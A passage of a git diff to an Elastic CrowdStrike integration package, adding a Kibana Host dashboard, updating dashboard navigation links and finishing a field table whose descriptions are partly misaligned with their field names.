crowdstrike.host.device_policies.firewall.policy.type | The platform ID of the host. | keyword | +| crowdstrike.host.device_policies.firewall.rule_set_id | The platform name of the host. | keyword | +| crowdstrike.host.device_policies.global_config.applied | The description of the product type of the host. | boolean | +| crowdstrike.host.device_policies.global_config.applied_date | The product type of the host. | date | +| crowdstrike.host.device_policies.global_config.assigned_date | The site name associated with the host. | date | +| crowdstrike.host.device_policies.global_config.policy.id | The status of the host. | keyword | +| crowdstrike.host.device_policies.global_config.policy.type | The manufacturer of the system on the host. | keyword | +| crowdstrike.host.device_policies.global_config.settings_hash | The product name of the system on the host. | keyword | +| crowdstrike.host.device_policies.prevention.applied | The objectives associated with the incident. | boolean | +| crowdstrike.host.device_policies.prevention.applied_date | The state of the incident, whether open or closed. | date | +| crowdstrike.host.device_policies.prevention.assigned_date | The status of the incident. | date | +| crowdstrike.host.device_policies.prevention.policy.id | The tactics associated with the incident. | keyword | +| crowdstrike.host.device_policies.prevention.policy.type | The techniques associated with the incident. | keyword | +| crowdstrike.host.device_policies.prevention.rule_groups | The type of incident. | keyword | +| crowdstrike.host.device_policies.prevention.settings_hash | The users associated with the incident. | keyword | +| crowdstrike.host.device_policies.remote_response.applied | | boolean | +| crowdstrike.host.device_policies.remote_response.applied_date | | date | +| crowdstrike.host.device_policies.remote_response.assigned_date | | date | +| crowdstrike.host.device_policies.remote_response.policy.id | | keyword | +| crowdstrike.host.device_policies.remote_response.policy.type | | keyword | +| crowdstrike.host.device_policies.remote_response.settings_hash | | keyword | +| crowdstrike.host.device_policies.sensor_update.applied | | boolean | +| crowdstrike.host.device_policies.sensor_update.applied_date | | date | +| crowdstrike.host.device_policies.sensor_update.assigned_date | | date | +| crowdstrike.host.device_policies.sensor_update.policy.id | | keyword | +| crowdstrike.host.device_policies.sensor_update.policy.type | | keyword | +| crowdstrike.host.device_policies.sensor_update.settings_hash | | keyword | +| crowdstrike.host.device_policies.sensor_update.uninstall_protection | | keyword | +| crowdstrike.host.external_ip | The external IP address of the host. | ip | +| crowdstrike.host.first_seen | | date | +| crowdstrike.host.group_hash | | keyword | +| crowdstrike.host.groups | | keyword | +| crowdstrike.host.hostname | The hostname of the host. | keyword | +| crowdstrike.host.id | Timestamp indicating when the incident started. | keyword | +| crowdstrike.host.kernel_version | | keyword | +| crowdstrike.host.last_seen | | date | +| crowdstrike.host.local_ip | | ip | +| crowdstrike.host.mac_address | The MAC address of the host. | keyword | +| crowdstrike.host.machine_domain | | keyword | +| crowdstrike.host.major_version | | keyword | +| crowdstrike.host.meta.version | | keyword | +| crowdstrike.host.meta.version_string | | keyword | +| crowdstrike.host.minor_version | | keyword | +| crowdstrike.host.modified_timestamp | Timestamp indicating when the incident was created. | date | +| crowdstrike.host.os.build | | keyword | +| crowdstrike.host.os.version | The version of the operating system on the host. | keyword | +| crowdstrike.host.platform.id | | keyword | +| crowdstrike.host.platform.name | The identifier associated with the customer. | keyword | +| crowdstrike.host.policies.applied | | boolean | +| crowdstrike.host.policies.applied_date | | date | +| crowdstrike.host.policies.assigned_date | | date | +| crowdstrike.host.policies.policy.id | | keyword | +| crowdstrike.host.policies.policy.type | | keyword | +| crowdstrike.host.policies.rule_groups | | keyword | +| crowdstrike.host.policies.settings_hash | | keyword | +| crowdstrike.host.product_type_desc | | keyword | +| crowdstrike.host.provision_status | | keyword | +| crowdstrike.host.reduced_functionality_mode | | keyword | +| crowdstrike.host.serial_number | | keyword | +| crowdstrike.host.site_name | | keyword | +| crowdstrike.host.status | | keyword | +| crowdstrike.host.system.manufacturer | | keyword | +| crowdstrike.host.system.product_name | | keyword | +| crowdstrike.host.tags | | keyword | +| data_stream.dataset | Data stream dataset. | constant_keyword | +| data_stream.namespace | Data stream namespace. | constant_keyword | +| data_stream.type | Data stream type. | constant_keyword | +| event.dataset | Event dataset. | constant_keyword | +| event.module | Event module. | constant_keyword | +| input.type | Type of filebeat input. | keyword | +| log.offset | Log offset. | long | +| tags | User defined tags. | keyword | + diff --git a/packages/crowdstrike/img/crowdstrike-alert-dashboard.png b/packages/crowdstrike/img/crowdstrike-alert-dashboard.png new file mode 100644 index 00000000000..f26d46ea9e6 Binary files /dev/null and b/packages/crowdstrike/img/crowdstrike-alert-dashboard.png differ diff --git a/packages/crowdstrike/img/crowdstrike-host-dashboard.png b/packages/crowdstrike/img/crowdstrike-host-dashboard.png new file mode 100644 index 00000000000..0b2d904d9b7 Binary files /dev/null and b/packages/crowdstrike/img/crowdstrike-host-dashboard.png differ diff --git a/packages/crowdstrike/kibana/dashboard/crowdstrike-2921b7f0-99b5-11ee-bf4d-afbc95e0486c.json b/packages/crowdstrike/kibana/dashboard/crowdstrike-2921b7f0-99b5-11ee-bf4d-afbc95e0486c.json new file mode 100644 index 00000000000..a544d2c8738 --- /dev/null +++ b/packages/crowdstrike/kibana/dashboard/crowdstrike-2921b7f0-99b5-11ee-bf4d-afbc95e0486c.json @@ -0,0 +1,740 @@ +{ + "attributes": { + "description": "Overview of the CrowdStrike Host Logs.", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "optionsJSON": { + "hidePanelTitles": false, + "syncColors": false, + "syncCursor": true, + "syncTooltips": false, + "useMargins": true + }, + "panelsJSON": [ + { + "embeddableConfig": { + "enhancements": {}, + "hidePanelTitles": false, + "savedVis": { + "data": { + "aggs": [], + "searchSource": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "description": "", + "id": "", + "params": { + "fontSize": 12, + "markdown": "**Navigation**\n\n**Crowdstrike** \n\n[Overview](#/dashboard/crowdstrike-e64e8fe0-8210-11ee-bae0-937af575b750) \n\n[FDR](#/dashboard/crowdstrike-a4972bc0-fb53-11eb-abed-07307b3f2b0f) \n\n[Falcon](#/dashboard/crowdstrike-ad80a080-821b-11ee-bae0-937af575b750) \n\n[Alert](#/dashboard/crowdstrike-d8070b00-99b3-11ee-bf4d-afbc95e0486c)\n\n**[Host](#/dashboard/crowdstrike-2921b7f0-99b5-11ee-bf4d-afbc95e0486c)**\n\n**Overview**\n\nThis dashboard shows statistics about the different hosts collected from the Crowdstrike Host/Device API.\n\n", + "openLinksInNewTab": false + }, + "title": "", + "type": "markdown", + "uiState": {} + } + }, + "gridData": { + "h": 17, + "i": "2676352c-5dfb-46c3-9c78-243d73fd2176", + "w": 14, + "x": 0, + "y": 0 + }, + "panelIndex": "2676352c-5dfb-46c3-9c78-243d73fd2176", + "title": "Table of Contents", + "type": "visualization", + "version": "8.10.1" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-200a15f3-d229-4812-ab0c-0241c9ca974e", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "af92b18a-b19c-4eea-88d7-7eef6ca7cea7", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "200a15f3-d229-4812-ab0c-0241c9ca974e": { + "columnOrder": [ + "b974dbbc-5ef2-4a53-bdb1-c8e089e39c8a", + "a73f0321-68b2-4319-9d06-3eb2eb117191" + ], + "columns": { + "a73f0321-68b2-4319-9d06-3eb2eb117191": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "___records___" + }, + "b974dbbc-5ef2-4a53-bdb1-c8e089e39c8a": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Host OS Platform", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "a73f0321-68b2-4319-9d06-3eb2eb117191", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 5 + }, + "scale": "ordinal", + "sourceField": "host.os.platform" + } + }, + "ignoreGlobalFilters": false, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "af92b18a-b19c-4eea-88d7-7eef6ca7cea7", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "crowdstrike.host" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "crowdstrike.host" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "categoryDisplay": "default", + "layerId": "200a15f3-d229-4812-ab0c-0241c9ca974e", + "layerType": "data", + "legendDisplay": "show", + "metrics": [ + "a73f0321-68b2-4319-9d06-3eb2eb117191" + ], + "nestedLegend": false, + "numberDisplay": "percent", + "primaryGroups": [ + "b974dbbc-5ef2-4a53-bdb1-c8e089e39c8a" + ], + "truncateLegend": false + } + ], + "shape": "pie" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsPie" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 17, + "i": "cfed76fa-d3ba-450b-8c8b-03a7e2834f7a", + "w": 16, + "x": 14, + "y": 0 + }, + "panelIndex": "cfed76fa-d3ba-450b-8c8b-03a7e2834f7a", + "title": "Host over OS Platform [Logs CrowdStrike]", + "type": "lens", + "version": "8.10.1" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-b6c130c0-83a9-4114-a597-1044d0ee891a", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "4275918f-e9ad-4439-b16c-190021e6a4dd", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "b6c130c0-83a9-4114-a597-1044d0ee891a": { + "columnOrder": [ + "980e0385-d489-4539-b0c8-3926472b30b0", + "d016ebe9-0bc9-4877-b874-045c3c619a6c" + ], + "columns": { + "980e0385-d489-4539-b0c8-3926472b30b0": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Hostname", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "d016ebe9-0bc9-4877-b874-045c3c619a6c", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "host.hostname" + }, + "d016ebe9-0bc9-4877-b874-045c3c619a6c": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "___records___" + } + }, + "ignoreGlobalFilters": false, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "4275918f-e9ad-4439-b16c-190021e6a4dd", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "crowdstrike.host" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "crowdstrike.host" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "accessors": [ + "d016ebe9-0bc9-4877-b874-045c3c619a6c" + ], + "layerId": "b6c130c0-83a9-4114-a597-1044d0ee891a", + "layerType": "data", + "position": "top", + "seriesType": "bar_stacked", + "showGridlines": false, + "xAccessor": "980e0385-d489-4539-b0c8-3926472b30b0" + } + ], + "legend": { + "isVisible": true, + "position": "right", + "shouldTruncate": false, + "showSingleSeries": false + }, + "preferredSeriesType": "bar_stacked", + "title": "Empty XY chart", + "valueLabels": "hide" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 17, + "i": "be658e9b-1f41-424b-a975-ab42befcb77e", + "w": 18, + "x": 30, + "y": 0 + }, + "panelIndex": "be658e9b-1f41-424b-a975-ab42befcb77e", + "title": "Host over Hostname [Logs CrowdStrike]", + "type": "lens", + "version": "8.10.1" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-ae6624d7-cc20-420b-994e-e9da30ce9d7e", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "a10dc271-d00d-4766-8ec4-28fe3978afea", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "ae6624d7-cc20-420b-994e-e9da30ce9d7e": { + "columnOrder": [ + "55ced9a5-9461-4aba-a522-92fad79ab843", + "dabab91c-4be8-4356-969c-270e7f21d6ba" + ], + "columns": { + "55ced9a5-9461-4aba-a522-92fad79ab843": { + "customLabel": true, + "dataType": "ip", + "isBucketed": true, + "label": "Host IP", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "dabab91c-4be8-4356-969c-270e7f21d6ba", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "host.ip" + }, + "dabab91c-4be8-4356-969c-270e7f21d6ba": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "___records___" + } + }, + "ignoreGlobalFilters": false, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "a10dc271-d00d-4766-8ec4-28fe3978afea", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "crowdstrike.host" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "crowdstrike.host" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "accessors": [ + "dabab91c-4be8-4356-969c-270e7f21d6ba" + ], + "layerId": "ae6624d7-cc20-420b-994e-e9da30ce9d7e", + "layerType": "data", + "position": "top", + "seriesType": "bar_stacked", + "showGridlines": false, + "xAccessor": "55ced9a5-9461-4aba-a522-92fad79ab843" + } + ], + "legend": { + "isVisible": true, + "position": "right", + "shouldTruncate": false, + "showSingleSeries": false + }, + "preferredSeriesType": "bar_stacked", + "title": "Empty XY chart", + "valueLabels": "hide" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "c5b14462-c4b7-4bc6-b826-592096b235ef", + "w": 24, + "x": 0, + "y": 17 + }, + "panelIndex": "c5b14462-c4b7-4bc6-b826-592096b235ef", + "title": "Host over Host IP [Logs CrowdStrike]", + "type": "lens", + "version": "8.10.1" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-c6d62863-d037-4156-a25c-6e4bc06b7885", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "de769611-9467-477d-9867-fc74698abdd9", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "c6d62863-d037-4156-a25c-6e4bc06b7885": { + "columnOrder": [ + "eb4c815b-4d40-4169-bba7-5cfd9408ae9a", + "396927e3-233a-4a3a-b459-929dafd53134", + "6e59d96a-2622-45fc-8b9b-ce38c1eb1556" + ], + "columns": { + "396927e3-233a-4a3a-b459-929dafd53134": { + "customLabel": true, + "dataType": "date", + "isBucketed": true, + "label": "Timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "6e59d96a-2622-45fc-8b9b-ce38c1eb1556": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "___records___" + }, + "eb4c815b-4d40-4169-bba7-5cfd9408ae9a": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Device ID", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "6e59d96a-2622-45fc-8b9b-ce38c1eb1556", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "secondaryFields": [], + "size": 10 + }, + "scale": "ordinal", + "sourceField": "device.id" + } + }, + "ignoreGlobalFilters": false, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "de769611-9467-477d-9867-fc74698abdd9", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "crowdstrike.host" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "crowdstrike.host" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "accessors": [ + "6e59d96a-2622-45fc-8b9b-ce38c1eb1556" + ], + "layerId": "c6d62863-d037-4156-a25c-6e4bc06b7885", + "layerType": "data", + "position": "top", + "seriesType": "bar_stacked", + "showGridlines": false, + "splitAccessor": "eb4c815b-4d40-4169-bba7-5cfd9408ae9a", + "xAccessor": "396927e3-233a-4a3a-b459-929dafd53134" + } + ], + "legend": { + "isVisible": true, + "position": "right", + "shouldTruncate": false, + "showSingleSeries": true + }, + "preferredSeriesType": "bar_stacked", + "title": "Empty XY chart", + "valueLabels": "hide", + "valuesInLegend": true + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "ea96fb11-edf9-470e-a7f9-903b084e1901", + "w": 24, + "x": 24, + "y": 17 + }, + "panelIndex": "ea96fb11-edf9-470e-a7f9-903b084e1901", + "title": "Host over Timestamp [Logs CrowdStrike]", + "type": "lens", + "version": "8.10.1" + } + ], + "timeRestore": false, + "title": "[Logs CrowdStrike] Host", + "version": 1 + }, + "coreMigrationVersion": "8.8.0", + "created_at": "2023-12-13T12:47:28.559Z", + "id": "crowdstrike-2921b7f0-99b5-11ee-bf4d-afbc95e0486c", + "managed": false, + "references": [ + { + "id": "logs-*", + "name": "cfed76fa-d3ba-450b-8c8b-03a7e2834f7a:indexpattern-datasource-layer-200a15f3-d229-4812-ab0c-0241c9ca974e", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "cfed76fa-d3ba-450b-8c8b-03a7e2834f7a:af92b18a-b19c-4eea-88d7-7eef6ca7cea7", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "be658e9b-1f41-424b-a975-ab42befcb77e:indexpattern-datasource-layer-b6c130c0-83a9-4114-a597-1044d0ee891a", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "be658e9b-1f41-424b-a975-ab42befcb77e:4275918f-e9ad-4439-b16c-190021e6a4dd", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "c5b14462-c4b7-4bc6-b826-592096b235ef:indexpattern-datasource-layer-ae6624d7-cc20-420b-994e-e9da30ce9d7e", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "c5b14462-c4b7-4bc6-b826-592096b235ef:a10dc271-d00d-4766-8ec4-28fe3978afea", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "ea96fb11-edf9-470e-a7f9-903b084e1901:indexpattern-datasource-layer-c6d62863-d037-4156-a25c-6e4bc06b7885", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "ea96fb11-edf9-470e-a7f9-903b084e1901:de769611-9467-477d-9867-fc74698abdd9", + "type": "index-pattern" + }, + { + "id": "crowdstrike-security-solution-default", + "name": "tag-ref-security-solution-default", + "type": "tag" + } + ], + "type": "dashboard", + "typeMigrationVersion": "8.9.0" +} \ No newline at end of file diff --git a/packages/crowdstrike/kibana/dashboard/crowdstrike-a4972bc0-fb53-11eb-abed-07307b3f2b0f.json b/packages/crowdstrike/kibana/dashboard/crowdstrike-a4972bc0-fb53-11eb-abed-07307b3f2b0f.json index 5aaa97fb365..a85671bc891 100644 --- a/packages/crowdstrike/kibana/dashboard/crowdstrike-a4972bc0-fb53-11eb-abed-07307b3f2b0f.json +++ b/packages/crowdstrike/kibana/dashboard/crowdstrike-a4972bc0-fb53-11eb-abed-07307b3f2b0f.json @@ -60,7 +60,7 @@ "id": "", "params": { "fontSize": 12, - "markdown": "**Navigation**\n\n**Crowdstrike** \n\n[Overview](#/dashboard/crowdstrike-e64e8fe0-8210-11ee-bae0-937af575b750) \n**[FDR](#/dashboard/crowdstrike-a4972bc0-fb53-11eb-abed-07307b3f2b0f)** \n[Falcon](#/dashboard/crowdstrike-ad80a080-821b-11ee-bae0-937af575b750) \n\n\n**Overview**\n\nThis dashboards shows statistics specific to Alerts and their different alert types that is received from Crowdstrike FDR.\n\n", + "markdown": "**Navigation**\n\n**Crowdstrike** \n\n[Overview](#/dashboard/crowdstrike-e64e8fe0-8210-11ee-bae0-937af575b750) \n\n**[FDR](#/dashboard/crowdstrike-a4972bc0-fb53-11eb-abed-07307b3f2b0f)** \n\n[Falcon](#/dashboard/crowdstrike-ad80a080-821b-11ee-bae0-937af575b750) \n\n[Alert](#/dashboard/crowdstrike-d8070b00-99b3-11ee-bf4d-afbc95e0486c)\n\n[Host](#/dashboard/crowdstrike-2921b7f0-99b5-11ee-bf4d-afbc95e0486c)\n\n**Overview**\n\nThis dashboards shows statistics specific to Alerts and their different alert types that is received from Crowdstrike FDR.\n\n", "openLinksInNewTab": false }, "title": "", diff --git a/packages/crowdstrike/kibana/dashboard/crowdstrike-ad80a080-821b-11ee-bae0-937af575b750.json b/packages/crowdstrike/kibana/dashboard/crowdstrike-ad80a080-821b-11ee-bae0-937af575b750.json index 0a16a8d7dce..2f7ce172f38 100644 --- a/packages/crowdstrike/kibana/dashboard/crowdstrike-ad80a080-821b-11ee-bae0-937af575b750.json +++ b/packages/crowdstrike/kibana/dashboard/crowdstrike-ad80a080-821b-11ee-bae0-937af575b750.json @@ -66,7 +66,7 @@ "id": "", "params": { "fontSize": 12, - "markdown": "**Navigation**\n\n**Crowdstrike** \n\n[Overview](#/dashboard/crowdstrike-e64e8fe0-8210-11ee-bae0-937af575b750) \n[FDR](#/dashboard/crowdstrike-a4972bc0-fb53-11eb-abed-07307b3f2b0f) \n**[Falcon](#/dashboard/crowdstrike-ad80a080-821b-11ee-bae0-937af575b750)** \n\n**Overview**\n\nThis dashboards shows statistics about the different Incidents and events collected from Crowdstrike Falcon.\n\n", + "markdown": "**Navigation**\n\n**Crowdstrike** \n\n[Overview](#/dashboard/crowdstrike-e64e8fe0-8210-11ee-bae0-937af575b750) \n\n[FDR](#/dashboard/crowdstrike-a4972bc0-fb53-11eb-abed-07307b3f2b0f) \n\n**[Falcon](#/dashboard/crowdstrike-ad80a080-821b-11ee-bae0-937af575b750)** \n\n[Alert](#/dashboard/crowdstrike-d8070b00-99b3-11ee-bf4d-afbc95e0486c)\n\n[Host](#/dashboard/crowdstrike-2921b7f0-99b5-11ee-bf4d-afbc95e0486c)\n\n**Overview**\n\nThis dashboards shows statistics about the different Incidents and events collected from Crowdstrike Falcon.\n\n", "openLinksInNewTab": false }, "title": "", diff --git a/packages/trendmicro/kibana/dashboard/trendmicro-8efdcf10-a2fc-11ed-bd5a-0d4c2fb00c2c.json b/packages/crowdstrike/kibana/dashboard/crowdstrike-d8070b00-99b3-11ee-bf4d-afbc95e0486c.json similarity index 61% rename from packages/trendmicro/kibana/dashboard/trendmicro-8efdcf10-a2fc-11ed-bd5a-0d4c2fb00c2c.json rename to packages/crowdstrike/kibana/dashboard/crowdstrike-d8070b00-99b3-11ee-bf4d-afbc95e0486c.json index 618f97c6286..29f98cc2711 100644 --- a/packages/trendmicro/kibana/dashboard/trendmicro-8efdcf10-a2fc-11ed-bd5a-0d4c2fb00c2c.json +++ b/packages/crowdstrike/kibana/dashboard/crowdstrike-d8070b00-99b3-11ee-bf4d-afbc95e0486c.json @@ -1,45 +1,9 @@ { - "id": "trendmicro-8efdcf10-a2fc-11ed-bd5a-0d4c2fb00c2c", - "type": "dashboard", - "namespaces": [ - "default" - ], - "updated_at": "2023-02-02T13:46:48.337Z", - "created_at": "2023-02-02T13:46:48.337Z", - "version": "WzE5MTcsMV0=", "attributes": { - "controlGroupInput": { - "chainingSystem": "HIERARCHICAL", - "controlStyle": "oneLine", - "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", - "panelsJSON": "{\"dc90c1e0-1105-4006-87aa-2d84fdf2224d\":{\"order\":3,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"event.type\",\"title\":\"event.type\",\"id\":\"dc90c1e0-1105-4006-87aa-2d84fdf2224d\",\"enhancements\":{}}},\"c2302e6a-a8ab-4b98-b004-96a12088df42\":{\"order\":0,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"trendmicro.event.category\",\"title\":\"trendmicro.event.category\",\"id\":\"c2302e6a-a8ab-4b98-b004-96a12088df42\",\"enhancements\":{}}},\"5cb6c3b4-4c04-494a-9757-3da0089120f0\":{\"order\":1,\"width\":\"medium\",\"grow\":true,\"type\":\"rangeSliderControl\",\"explicitInput\":{\"fieldName\":\"trendmicro.event.signature_id\",\"title\":\"trendmicro.event.signature_id\",\"id\":\"5cb6c3b4-4c04-494a-9757-3da0089120f0\",\"enhancements\":{}}},\"8f323dd7-18da-44e4-b535-3f7cb3584bf2\":{\"order\":2,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"trendmicro.event.name\",\"title\":\"trendmicro.event.name\",\"id\":\"8f323dd7-18da-44e4-b535-3f7cb3584bf2\",\"enhancements\":{}}}}" - }, - "description": "", + "description": "Overview of the CrowdStrike Alert Logs.", "kibanaSavedObjectMeta": { "searchSourceJSON": { - "filter": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", - "key": "data_stream.dataset", - "negate": false, - "params": { - "query": "trendmicro.deep_security" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "data_stream.dataset": "trendmicro.deep_security" - } - } - } - ], + "filter": [], "query": { "language": "kuery", "query": "" @@ -54,13 +18,53 @@ "useMargins": true }, "panelsJSON": [ + { + "embeddableConfig": { + "enhancements": {}, + "hidePanelTitles": false, + "savedVis": { + "data": { + "aggs": [], + "searchSource": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "description": "", + "id": "", + "params": { + "fontSize": 12, + "markdown": "**Navigation**\n\n**Crowdstrike** \n\n[Overview](#/dashboard/crowdstrike-e64e8fe0-8210-11ee-bae0-937af575b750) \n\n[FDR](#/dashboard/crowdstrike-a4972bc0-fb53-11eb-abed-07307b3f2b0f) \n\n[Falcon](#/dashboard/crowdstrike-ad80a080-821b-11ee-bae0-937af575b750) \n\n**[Alert](#/dashboard/crowdstrike-d8070b00-99b3-11ee-bf4d-afbc95e0486c)**\n\n[Host](#/dashboard/crowdstrike-2921b7f0-99b5-11ee-bf4d-afbc95e0486c)\n\n**Overview**\n\nThis dashboard shows statistics about the different alerts collected from the Crowdstrike Alert API.\n\n", + "openLinksInNewTab": false + }, + "title": "", + "type": "markdown", + "uiState": {} + } + }, + "gridData": { + "h": 16, + "i": "da4bfceb-5882-4577-9ead-316c338c7569", + "w": 16, + "x": 0, + "y": 0 + }, + "panelIndex": "da4bfceb-5882-4577-9ead-316c338c7569", + "title": "Table of Contents", + "type": "visualization", + "version": "8.10.1" + }, { "embeddableConfig": { "attributes": { + "description": "", "references": [ { "id": "logs-*", - "name": "indexpattern-datasource-layer-c548b323-aad7-4518-b361-b6d2300d784a", + "name": "indexpattern-datasource-layer-836a096e-11de-4f16-8dc1-08de3e3a2b2f", "type": "index-pattern" } ], @@ -69,17 +73,29 @@ "datasourceStates": { "formBased": { "layers": { - "c548b323-aad7-4518-b361-b6d2300d784a": { + "836a096e-11de-4f16-8dc1-08de3e3a2b2f": { "columnOrder": [ - "469f7b8c-22ce-4e81-92a3-09a25d9dcc8f", - "a9ca7ee9-fe03-483e-bea1-b8e2462609c6" + "e1dfcfae-1d38-4434-b22c-847e1a2ef8d7", + "c04767a1-9e74-4057-a95a-0d1ccb016a67" ], "columns": { - "469f7b8c-22ce-4e81-92a3-09a25d9dcc8f": { + "c04767a1-9e74-4057-a95a-0d1ccb016a67": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "___records___" + }, + "e1dfcfae-1d38-4434-b22c-847e1a2ef8d7": { "customLabel": true, "dataType": "string", "isBucketed": true, - "label": "Trend Micro Event Category", + "label": "Alert Status", "operationType": "terms", "params": { "exclude": [], @@ 